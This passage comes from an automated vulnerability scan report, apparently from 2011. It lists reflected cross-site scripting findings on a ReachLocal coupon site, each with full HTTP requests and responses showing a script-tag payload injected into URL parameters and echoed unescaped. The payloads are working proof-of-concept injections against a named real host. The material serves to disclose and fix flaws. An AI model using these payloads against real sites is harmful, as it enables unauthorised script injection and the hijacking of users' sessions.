GET /coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=db859"><script>alert(1)</script>c1c2d326329&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748 HTTP/1.1 Host: utdi.reachlocal.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 11:53:08 GMT Server: Apache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Vary: Accept-Encoding Content-Length: 3043 Content-Type: text/html Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:00 GMT;path=/;httponly
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
<title>UTDI (san francisco,CA)</title>
<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1"> ...[SNIP]... <frame src="/coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=db859"><script>alert(1)</script>c1c2d326329&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1" name="RL_main" topmargin=0 leftmargi ...[SNIP]...
2.58. http://utdi.reachlocal.com/coupon/ [pub_cr_id parameter]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.com
Path: /coupon/
Issue detail
The value of the pub_cr_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98d06"><script>alert(1)</script>76c9d147fa9 was submitted in the pub_cr_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=98d06"><script>alert(1)</script>76c9d147fa9 HTTP/1.1 Host: utdi.reachlocal.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 11:53:16 GMT Server: Apache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Vary: Accept-Encoding Content-Length: 3061 Content-Type: text/html Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:09 GMT;path=/;httponly
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
<title>UTDI (san francisco,CA)</title>
<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1"> ...[SNIP]... 5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=98d06"><script>alert(1)</script>76c9d147fa9&rl_track_landing_pages=1" name="RL_main" topmargin=0 leftmargin=0 marginwidth=0 marginheight=0 noresize frameborder="no" scrolling="NO"> ...[SNIP]...
2.59. http://utdi.reachlocal.com/coupon/ [rl_key parameter]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.com
Path: /coupon/
Issue detail
The value of the rl_key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d92f9"><script>alert(1)</script>de87c2b7e5 was submitted in the rl_key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=d92f9"><script>alert(1)</script>de87c2b7e5&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748 HTTP/1.1 Host: utdi.reachlocal.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 11:52:55 GMT Server: Apache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Vary: Accept-Encoding Content-Length: 3015 Content-Type: text/html Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:48 GMT;path=/;httponly
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
<title>UTDI (san francisco,CA)</title>
<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1"> ...[SNIP]... <frame src="/coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=d92f9"><script>alert(1)</script>de87c2b7e5&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landin ...[SNIP]...
2.60. http://utdi.reachlocal.com/coupon/ [scid parameter]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.com
Path: /coupon/
Issue detail
The value of the scid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6519"><script>alert(1)</script>c8b035ec73b was submitted in the scid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/?scid=e6519"><script>alert(1)</script>c8b035ec73b&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748 HTTP/1.1 Host: utdi.reachlocal.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 11:52:43 GMT Server: Apache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Vary: Accept-Encoding Content-Length: 3056 Content-Type: text/html Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:35 GMT;path=/;httponly
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
<title>UTDI (san francisco,CA)</title>
<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1"> ...[SNIP]... <frame src="/coupon/d837/837045/index5.html?scid=e6519"><script>alert(1)</script>c8b035ec73b&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26i ...[SNIP]...
2.61. http://utdi.reachlocal.com/coupon/ [se_refer parameter]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.com
Path: /coupon/
Issue detail
The value of the se_refer request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61005"><script>alert(1)</script>ee0a10336fd was submitted in the se_refer parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=61005"><script>alert(1)</script>ee0a10336fd&pub_cr_id=8668759748 HTTP/1.1 Host: utdi.reachlocal.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 11:53:12 GMT Server: Apache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Vary: Accept-Encoding Content-Length: 2891 Content-Type: text/html Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:05 GMT;path=/;httponly
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
<title>UTDI (san francisco,CA)</title>
<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1"> ...[SNIP]... <frame src="/coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=61005"><script>alert(1)</script>ee0a10336fd&pub_cr_id=8668759748&rl_track_landing_pages=1" name="RL_main" topmargin=0 leftmargin=0 marginwidth=0 marginheight=0 noresize frameborder="no" scrolling="NO"> ...[SNIP]...
2.62. http://utdi.reachlocal.com/coupon/ [tc parameter]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.com
Path: /coupon/
Issue detail
The value of the tc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3305c"><script>alert(1)</script>2dc212c00e9 was submitted in the tc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/?scid=2323693&cid=837045&tc=3305c"><script>alert(1)</script>2dc212c00e9&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748 HTTP/1.1 Host: utdi.reachlocal.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 11:52:51 GMT Server: Apache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Vary: Accept-Encoding Content-Length: 3047 Content-Type: text/html Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:44 GMT;path=/;httponly
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
<title>UTDI (san francisco,CA)</title>
<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1"> ...[SNIP]... <frame src="/coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=3305c"><script>alert(1)</script>2dc212c00e9&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bserv ...[SNIP]...
2.63. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [cid parameter]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.com
Path: /coupon/d837/837045/index5.html
Issue detail
The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ca2e"><script>alert(1)</script>2688833dcab was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d837/837045/index5.html?scid=2323693&cid=8370453ca2e"><script>alert(1)</script>2688833dcab&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1 Host: utdi.reachlocal.com Proxy-Connection: keep-alive Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 11:52:52 GMT Server: Apache Vary: Accept-Encoding P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Content-Length: 3263 Content-Type: text/html Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:44 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html> <head> <title>ReachLocal Index</title> <LINK href="h ...[SNIP]... <a class="ad_header_url" href="/coupon/d837/837045/index4.html?scid=2323693&cid=8370453ca2e"><script>alert(1)</script>2688833dcab&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%2 ...[SNIP]...
2.64. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [dynamic_proxy parameter]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.com
Path: /coupon/d837/837045/index5.html
Issue detail
The value of the dynamic_proxy request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 846db"><script>alert(1)</script>3e97297b77d was submitted in the dynamic_proxy parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1846db"><script>alert(1)</script>3e97297b77d&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1 Host: utdi.reachlocal.com Proxy-Connection: keep-alive Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 11:53:00 GMT Server: Apache Vary: Accept-Encoding P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Content-Length: 3263 Content-Type: text/html Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:53 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html> <head> <title>ReachLocal Index</title> <LINK href="h ...[SNIP]... <a class="ad_header_url" href="/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1846db"><script>alert(1)</script>3e97297b77d&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1" target="RL_top" ...[SNIP]...
2.65. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [kw parameter]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.com
Path: /coupon/d837/837045/index5.html
Issue detail
The value of the kw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8930"><script>alert(1)</script>784bb32d3 was submitted in the kw parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292e8930"><script>alert(1)</script>784bb32d3&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1 Host: utdi.reachlocal.com Proxy-Connection: keep-alive Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 11:52:58 GMT Server: Apache Vary: Accept-Encoding P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Content-Length: 3259 Content-Type: text/html Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:51 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html> <head> <title>ReachLocal Index</title> <LINK href="h ...[SNIP]... <a class="ad_header_url" href="/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292e8930"><script>alert(1)</script>784bb32d3&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1" ...[SNIP]...
2.66. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.com
Path: /coupon/d837/837045/index5.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 790de"><script>alert(1)</script>9051fd7fffb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1&790de"><script>alert(1)</script>9051fd7fffb=1 HTTP/1.1 Host: utdi.reachlocal.com Proxy-Connection: keep-alive Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 11:53:11 GMT Server: Apache Vary: Accept-Encoding P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Content-Length: 3269 Content-Type: text/html Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:04 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html> <head> <title>ReachLocal Index</title> <LINK href="h ...[SNIP]... &dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1&790de"><script>alert(1)</script>9051fd7fffb=1" target="RL_top" onClick="javascript:open_popup('/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&prima ...[SNIP]...
2.67. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [primary_serv parameter]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.com
Path: /coupon/d837/837045/index5.html
Issue detail
The value of the primary_serv request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58fcc"><script>alert(1)</script>222f71544b5 was submitted in the primary_serv parameter. This input was echoed unmodified in the application's response.
